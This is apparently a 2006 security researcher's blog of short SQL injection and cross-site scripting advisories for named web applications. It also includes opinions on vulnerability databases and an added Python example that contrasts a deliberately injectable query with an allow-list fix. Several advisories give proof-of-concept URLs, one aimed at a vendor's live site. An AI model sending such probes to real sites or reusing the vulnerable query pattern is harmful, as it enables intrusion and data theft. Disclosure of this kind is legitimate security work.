Open-Realty contains a flaw that allows remote SQL injection attacks. Input passed to the "sorttype" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Free Realty vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://freerealty.rwcinc.net/
affected versions:2.9-0.7,2.9-0.6 and prior
###############################################

Vuln. Description:

Free Realty contains a flaw that allows remote SQL injection attacks. Input passed to the "sort" parameter in "propview.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Note about prior versions:
I also tested that bug on the demo site, which is 2.9-0.6, and XSS was possible in the same variable ...
And in some earlier 2.9 versions, an error gives the attacker the installation's full path and other info.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BtitTracker SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.btiteam.org/
affected versions:v.1.3.2 and prior
###############################################

Vuln. Description:

BtitTracker contains a flaw that allows remote SQL injection attacks. Input passed to the "by" and "order" parameters in "torrents.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpMyDirectory XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.phpmydirectory.com/
affected versions:v.10.4.5 and prior
###############################################

Vuln. Description:

phpMyDirectory contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "PIC" parameter in "offers-pix.php", to the "from" parameter in "cp/index.php" and to the "action" parameter in "cp/admin_index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Sunday, June 18, 2006

Sharky e-shop XSS

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:http://www.lombar.net/shop/main.asp
affected versions:3.05 and prior
###############################################

Vuln. Description:

Sharky e-shop contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "maingroup" and "secondgroup" parameters in "search_prod_list.asp" and to the "maingroup" parameter in "meny2.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

The Edge eCommerce Shop XSS

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:https://www.theedgeshop.com/index.html
affected versions:last
###############################################

Vuln. Description:

The Edge eCommerce Shop contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "cart_id" parameter in "productDetail.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tradingeye Shop R4 XSS

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:http://www.dpivision.com/
affected versions:R4 and prior
###############################################

Vuln. Description:

Tradingeye Shop contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "image" parameter in "details.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

tplShop v 2.0 vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:http://www.tpl-design.com/tplshop/
affected versions:V 2.0 and prior
###############################################

Vuln. Description:

tplShop contains a flaw that allows remote SQL injection attacks. Input passed to the "first_row" parameter in "category.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

xarancms V2.0 vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:www.xaran.de/html/xaran_xarancmsV2.0.php
affected versions:V2.0 and prior
###############################################

Vuln. Description:

xarancms contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter in "xarancms_haupt.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, June 15, 2006

SiteForge Collaborative Development Platform XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.sitelliteforge.com/
affected versions:1.0.4 and prior
###############################################

Vuln. Description:

SiteForge Collaborative Development Platform contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "_status", "_extra1", "_extra2" and "_extra3" parameters isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

http://www.sitelliteforge.com/index/siteforge-bugs-action/proj.siteforge?proj=siteforge&_status=%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action/proj.siteforge?proj=siteforge&_extra1=%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action/proj.siteforge?proj=siteforge&_extra1=&_extra3=%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action/proj.siteforge?proj=siteforge&_extra1=&_extra3=&_extra2=%3Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Virtual War multiple SQL inj. vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.vwar.de/
affected versions:v1.5.0 R14 and prior
###############################################

Vuln. Description:

Virtual War contains a flaw that allows remote SQL injection attacks. Input passed to the "s", "showgame", "sortorder" and "sortby" parameters in "war.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
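
An added example, not code from Virtual War or any other product listed here: the fix pattern for sort parameters such as "sortby"/"sortorder" and the "by"/"order", "sort" and "sorttype" parameters in the advisories above, plus a numeric offset like "first_row". It assumes these values pick the ORDER BY column, the direction and the starting row, which the advisories do not state; the table, column and function names are hypothetical and the rows are constructed.

```python
import sqlite3


def make_db():
    """Constructed sample data in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wars (id INTEGER PRIMARY KEY, "
               "opponent TEXT, game TEXT, played TEXT)")
    db.executemany(
        "INSERT INTO wars (opponent, game, played) VALUES (?, ?, ?)",
        [("alpha", "cs", "2006-06-01"),
         ("bravo", "q3", "2006-06-03"),
         ("charlie", "cs", "2006-06-02")])
    return db


def list_wars_unsafe(db, game, sortby, sortorder):
    """Vulnerable pattern: request values are concatenated into the SQL."""
    sql = ("SELECT opponent FROM wars WHERE game = '" + game + "'"
           " ORDER BY " + sortby + " " + sortorder)
    return sql, [row[0] for row in db.execute(sql)]


# A bound parameter can only carry a value, never a column name or a
# keyword, so identifiers are chosen from fixed allow-lists instead.
SORT_COLUMNS = {"opponent": "opponent", "game": "game", "date": "played"}
SORT_ORDERS = {"asc": "ASC", "desc": "DESC"}


def to_offset(raw, maximum=10000):
    """Accept only ASCII digits for the starting row; fall back to 0."""
    if not (raw.isascii() and raw.isdigit()):
        return 0
    return min(int(raw), maximum)


def list_wars_safe(db, game, sortby, sortorder, first_row="0"):
    """Hardened form: values are bound, identifiers come from allow-lists."""
    column = SORT_COLUMNS.get(sortby, "played")
    direction = SORT_ORDERS.get(sortorder.lower(), "ASC")
    # Only text from the two dictionaries above is formatted into the SQL.
    sql = ("SELECT opponent FROM wars WHERE game = ?"
           " ORDER BY " + column + " " + direction + " LIMIT 20 OFFSET ?")
    rows = db.execute(sql, (game, to_offset(first_row)))
    return sql, [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    # The request decides the whole ORDER BY clause in the unsafe version.
    print(list_wars_unsafe(db, "cs", "played DESC, opponent", "ASC"))
    # The same input falls back to the default column in the safe version.
    print(list_wars_safe(db, "cs", "played DESC, opponent", "ASC"))
```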

openCI SQL inj.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.openci.info/
affected versions: v.1.0 BETA 0.20.1 and prior
###############################################

Vuln. Description:

openCI contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Upgrade to v.1.0 BETA 0.30.0
###############################################
More information @ unsecured-systems.com/forum/

SSPwiz XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.sspwiz.com/
affected versions:SSPwiz Plus 1.0.7 and prior
###############################################

Vuln. Description:

SSPwiz contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "message" parameter in "index.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

iPostMX 2005 vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.ipostmx.com/
affected versions:2.0 and prior
###############################################

Vuln. Description:


iPostMX 2005 contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "RETURNURL" parameter in "userlogin.cfm" and "account.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

aXentForum II XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.axent.us/axentforum.cfm
affected versions:aXentForum II and prior
###############################################

Vuln. Description:

aXentForum II contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "startrow" parameter in "viewposts.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

aXentGuestbook I.I XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.axent.us/axentguestbook.cfm
affected versions:aXentGuestbook I.I and prior
###############################################

Vuln. Description:

aXentGuestbook contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "startrow" parameter in "guestbook.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

LivingDot Photos XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://photoblog.livingdot.com/
affected versions:latest and prior
###############################################

Vuln. Description:

LivingDot Photos contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "page" parameter in "comment.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tuesday, June 13, 2006

EvGenius Counter XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 13 june 2006
vendor:http://counter.evgenius.net/
affected versions:3.4 and prior
###############################################

Vuln. Description:

EvGenius Counter contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "page" parameter in "monthly.php" and "daily.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, June 10, 2006

DwZone Shopping Cart XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 june 2006
vendor:http://www.dwzone.it/Extension/ShoppingCart/default.asp
affected versions:1.1.9 and prior
###############################################

Vuln. Description:

DwZone Shopping Cart contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "ToCategory" and "FromCategory" parameters in "ProductDetailsForm.asp" and to the "UserName" and "Password" parameters in "LogIn/VerifyUserLog.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Xtreme ASP Photo Gallery XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 june 2006
vendor:http://pensacolawebdesigns.com/xtremeasp/default.asp
affected versions:1.05 and prior
###############################################

Vuln. Description:

Xtreme ASP Photo Gallery contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "catname" and "total" parameters in "displaypic.asp" and to the "catname" parameter in "displaythumbs.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Uphotogallery XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 june 2006
vendor:www.uapplication.com/uphotogallery/index.asp
affected versions:1.1 and prior
###############################################

Vuln. Description:

Uphotogallery contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "s" and "Block" parameters in "thumbnails.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, June 09, 2006

ePhotos vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://enthrallweb.com/detail.asp?ProductID=13
affected versions:2.2 and prior
###############################################

Vuln. Description:

ePhotos contains a flaw that allows remote SQL injection attacks. Input passed to the "CAT_ID" parameter in "subphotos.asp" and "subLevel2.asp", to the "AL_ID" parameter in "photo.asp" and to the "SUB_ID" parameter in "subLevel2.asp" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

i-Gallery XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.b-cp.com/igallery/
affected versions:i-Gallery 4.1 PLUS and prior
###############################################

Vuln. Description:

i-Gallery contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "n" and "d" parameters in "login.asp" and to the "d" parameter in "igallery.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

bugtraqs @ all

Hi guys, as in the last 6 months I have reported some bugs in web applications, I think that I can say something about bugtraqs in general.
Some criticism, of course..

Let's start with secunia.com
A security research company which is originally located in Denmark. Those guys do a lot of work, and they do a lot in their own research.. they try to verify all reported vulns. OK, sometimes their verification isn't as successful as some attacker's exploitation of a bug, but don't forget that they try to verify everything, so that point makes them the best of all.


Next I want to look at osvdb.org
Open source vuln. database - that says something. Great guys, they verify all the stuff, that's why they come out later than the others.
They were my favorites, but in my eyes they lost the favorite place when they started to use the words "Exploit is Rumored" for examples.
On that point, if I give an example like http://victim/vuln_app/index.php?cat=[XSS]
That one isn't an exploit; did I ever publish it as an exploit?
It's an example for those who like to or must verify.
So that's why it "was" my favorite.


So one of the most popular for years is securityfocus.com

They are good enough. I never sent them one of my reports.. oh.. yes, once it was as a bugtraq for some site application, yahoo or another one.
I was laughing when I saw credits like discovered by "rakstija r0t3d3vil" ... "rakstija" is a Latvian word - wrote.
At the start of my report it is always written which guy discovered it, but that only means that those guys need better glasses than I have.
Why didn't I report to them?
Simple answer - where to report?
If I can't find it within 2 clicks I don't have any more interest in reporting to them.

Next one will be frsirt.com

Nice guys, but they don't verify by themselves, but wait for the secunia guys.
I think that tells everything.

The next one is security.nnov.ru

Nice Russian guys, they are more a buglist than a bugtraq, because they don't verify anything.
But a good point about them: they are the fastest updated "bugtraq" on earth.

and nvd.nist.gov

National vulnerability database, that says nothing.. but a domain which ends with ".gov" says something on its own. Their risk rating isn't better than that of SANS. I don't think that they have a lot of reports from guys who discover vulns., but they are good at collecting them even though they are from .gov


and of course xforce.iss.net

I will say it's the black horse in that challenge.
I never sent them a report of my work, but they always know everything.
Maybe they are placed as an outsider among the best ones, but they do a good job.


yes and milw0rm.com

str0ke does a good job overall; the site is specific because it is mostly based on exploits and the reports mostly come only with exploits, that's not bad at all.

yes and the popular Russian source securitylab.ru

They don't verify and they remove links to the original advisory, that's the point why I don't like to report to them.. But that's not only them, mostly all Russian security resources remove advisory authors and original sources... but that's in the best case, sometimes they like to give credit to themselves.. So the worst security or bugtraq scene in the world is the Russian one.
Another Russian one which I know is hackzona.ru; they only translate random advisories from secunia and that's all, and there is no point like "when" or "who"... who cares?
Another one is xakep.ru - they have their own successful journal and other things for n00bs.
Most of the bugtraq'ed things they publish as their own.


secwatch.org ....

They collect info from the biggest bugtraqs and have their own bugtraq list, which also isn't verified.

netsecurity.com

copy/paste - that says everything.


hackerscenter.com

Not a bugtraq, but a portal which has a bugtraq. Of course they don't verify, but it's better than the Russian ones on one point, because they don't forget about the guys who discovered the stuff which they publish.


So I think I have written about the most popular bugtraqs; if I missed some, then sorry ...

ClickGallery vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:ClickTech
affected versions:5.0 and prior
###############################################


ClickGallery contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "gallery_id" parameter in "gallery.asp" and to the "parentcurrentpage" parameter in "view_gallery.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

fipsCMS <=v4.5 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:fipsASP
affected versions:v4.5 and prior
###############################################

Vuln. Description:

fipsCMS contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to multiple parameters ("w", "phcat", "dayid", "calw") in "index.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

fipsGallery vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:fipsASP
affected versions:v1.5 and prior
###############################################


Vuln. Description:

fipsGallery contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "path" parameter in "zoom.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Clickcart 6.0 XSS

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:ClickTech
affected versions:6.0 and prior
###############################################

Vuln. Description:

Clickcart contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "cat" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

WS-Album XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:PlaneteAfrique
affected versions:1.1 and prior
###############################################

Vuln. Description:

WS-Album contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "image" and "PublisedDate" parameters in "FullPhoto.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

EZGallery <= v1.5 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:www.htmljunction.net/ezgallery/
affected versions:v1.5 and prior
###############################################

Vuln. Description:


EZGallery contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to multiple parameters (pUserID, aid, aname, uid, m) in "common/galleries.asp", to multiple parameters (aid, aname, uid, m, gp, g) in "common/pupload.asp", and to the "msg", "fn" and "gp" parameters in "common/upload.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

My Photo Scrapbook vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:www.esoftwaresite.com/aspscripts/scrapbook/marketing/main.htm
affected versions: 1.0 and prior
###############################################

Vuln. Description:

1.
My Photo Scrapbook contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "key_m" parameter in "display.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2.
Input passed to the "key" parameter in "Displayview.asp" and "Details_Photo_bv.asp" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ASP ListPics <=4.3 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.iisworks.com/listpics/
affected versions: 4.3 and prior
###############################################

Vuln. Description:

ASP ListPics contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "Info" parameter in "listpics.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:

/listpics.asp?a=rate&ID=1&Info=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

KAPhotoservice <=7.5 vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.kaphotoservice.com/
affected versions: 7.5 and prior
###############################################


Vuln. Description:


1. Script Insertion attack vuln.

KAPhotoservice contains a flaw that allows remote script insertion attacks. Input supplied to the "New Category" parameter in "edtalbum.asp" isn't properly sanitised before being used. This can be exploited to insert arbitrary script code, which will be executed in a user's browser session in context of an affected site when the malicious data is viewed.



2. Cross-Site Scripting attack vuln.

KAPhotoservice contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "cat" and "albumid" parameters in "album.asp" and input passed to the "apage" parameter in "edtalbum.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

/album.asp?cat=[XSS]&albumid=1
/albums.asp?cat=&albumid=[XSS]
/edtalbum.asp?cat=&albumid=1&apage=[XSS]



note for developer:
You will receive my test results via the report module in your software, but only those where SQL injection is possible.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

VanillaSoft Helpdesk XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.vanillasoft.ch/en/
affected versions:Version 2005 and prior
###############################################

Vuln. Description:

VanillaSoft Helpdesk contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "username" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

OfficeFlow <=2.6 vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.asptools.biz/officeflow.asp
affected versions:2.6 and prior
###############################################

Vuln. Description:


1. Cross-Site Scripting attack vuln.

OfficeFlow contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "sqlType" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


2. SQL injection attack vuln.

OfficeFlow contains a flaw that allows remote SQL injection attacks. Input passed to the "Project" parameter in "files.asp" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, June 07, 2006

about general

I decided that the blog isn't the best place to continue publishing proxies & socks, cauz it takes too much space in your view.
Since yesterday, proxies & socks are published on our board.
I will try to contribute daily, but for how long I don't know.

OK.
Another point: for the second time I have heard that I am in some other places; one was Security Castle and the other some Turkish hackers' board.
I don't know who those persons are, but that's not me... you can meet me only here or on our board.

About the Crew,
cembo will make an SQL & XSS tool that will help lazy guys to discover vulns.
And the new PMB release will also come soon.
As I already told FrozenEye, I will write a simple tut on how to discover SQL/XSS vulns in web applications and other nuances in that case. My tut will not open a new America; it has already been said/written by many people, it will just be from another view, or my view.
We are also working on other stuff; when we come closer to complete results... then you will know more.
Hm... I said almost all that I wanted to say, just... I don't like the situation which we have on the board... it's about mods. I am already discussing that with some people... I have some candidates, but I'm not sure, and they aren't sure, that we can work together, so the need for mods is still current; so if you think you are the right person, or you wanna be that person, go to our board and speak with the guys or with me.

Tuesday, June 06, 2006

OBM Multiple SQL inj. and XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 6 june 2006
vendor:http://obm.aliacom.fr/
affected versions:
tested on 1.0.3pl1 version.
other versions also can be affected.
###############################################


Vuln. Description:


1. Multiple SQL injection vuln.

OBM contains a flaw that allows remote SQL injection attacks. Input passed to the "new_order" and "order_dir" parameters in "group/group_index.php", "user/user_index.php", "list/list_index.php" and "company/company_index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.



2. Multiple Cross-Site Scripting attack vuln.

OBM contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "tf_lang", "tf_name", "tf_user", "tf_lastname", "tf_contact", "tf_datebefore" and "tf_dateafter" parameters in certain files isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Some examples:

http://obm-host/publication/publication_index.php?tf_title=&sel_type=_ALL_&tf_year=&tf_lang=[XSS]

http://obm-host/group/group_index.php?action=search&tf_name=[XSS]

http://obm-host/group/group_index.php?action=search&tf_name=&tf_user=[XSS]

http://obm-host/user/user_index.php?action=search&tf_login=&tf_lastname=[XSS]

http://obm-host/list/list_index.php?action=search&tf_name=[XSS]

http://obm-host/list/list_index.php?action=search&tf_name=&tf_contact=[XSS]

http://obm-host/group/group_index.php?action=search&tf_name=&tf_user=&page=&new_order=[SQL]

http://obm-host/group/group_index.php?action=search&tf_name=&tf_user=&page=&new_order=group_email&order_dir=[SQL]

http://obm-host/?action=search&tf_login=&tf_lastname=&sel_perms=&tf_email=&tf_desc=&tf_group=&cb_archive=&page=&new_order=[SQL]

http://obm-host/user/user_index.php?action=search&tf_login=&tf_lastname=&sel_perms=&tf_email=&tf_desc=&tf_group=&cb_archive=&page=&new_order=userobm_lastname&order_dir=[SQL]

http://obm-host/list/list_index.php?action=search&tf_name=&tf_contact=&sel_market=&page=&new_order=list_subject&order_dir=[SQL]

http://obm-host/list/list_index.php?action=search&tf_name=&tf_contact=&sel_market=&page=&new_order=[SQL]

http://obm-host/company/company_index.php?action=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel_dsrc=&tf_dateafter=&tf_datebefore=[XSS]

http://obm-host/company/company_index.php?action=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel_dsrc=&tf_dateafter=&tf_datebefore=&page=&new_order=company_vat&order_dir=DESC&entity=[SQL]

http://obm-host/company/company_index.php?action=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel_dsrc=&tf_dateafter=&tf_datebefore=&page=&new_order=company_vat&order_dir=[SQL]

http://obm-host/company/company_index.php?action=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel_dsrc=&tf_dateafter=&tf_datebefore=&page=&new_order=[SQL]

http://obm-host/company/company_index.php?action=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel_dsrc=&tf_dateafter=[SQL]

http://obm-host/company/company_index.php?action=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel_dsrc=&tf_dateafter=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
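
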